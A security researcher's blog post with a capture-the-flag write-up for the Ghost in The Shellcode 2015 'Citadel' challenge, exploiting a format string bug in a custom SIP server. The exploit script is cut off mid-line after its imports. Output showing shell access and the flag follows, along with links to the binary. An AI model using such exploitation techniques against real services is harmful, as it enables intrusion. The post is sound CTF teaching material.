Joel Eriksson
CEO/Founder of ClevCode. Vulnerability researcher, exploit developer and reverse-engineer. Previous CTO and co-founder of Bitsec, which was acquired by Nixu, and Cycura which was acquired by WELL Technologies. Have spoken at BlackHat, DefCon and the RSA conference. CTF player. Puzzle solver (Cicada 3301, Boxen)

Ghost in The Shellcode 2015 Teaser: Citadel solution

This is my exploit for the Citadel challenge in the Ghost in The Shellcode 2015 Teaser CTF. I have attached my IDB as well, so those of you with IDA Pro can see what the reversing-part of the process looked like.

The Citadel challenge consisted of a custom SIP server (Linux/x86_64), with NX, ASLR and partial RELRO enabled. After some time reverse-engineering the binary, I discovered a format string vulnerability in a call to asprintf(). However, to actually get data under our control on the stack, in order to use the format string vulnerability effectively, I had to do some further digging…

My final exploit code:

#!/usr/bin/python
#
# Exploit for the Citadel challenge from the Ghost in the Shellcode 2015 Teaser CTF.
#
# Joel Eriksson  2014

import telnetlib
import struct
import socket
import sys

u64 = lambda x: struct.pack("

Below you can see the output of the exploit. :)

je@tiny:~$ ./citadel-xpl.py
uid=1000(citadel) gid=1000(citadel) groups=1000(citadel)
Linux ip-10-101-192-40 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
key{Should have used boost::format}

The vulnerable binary:
http://www.clevcode.org/files/citadel

My IDB for the binary:
http://www.clevcode.org/files/citadel.i64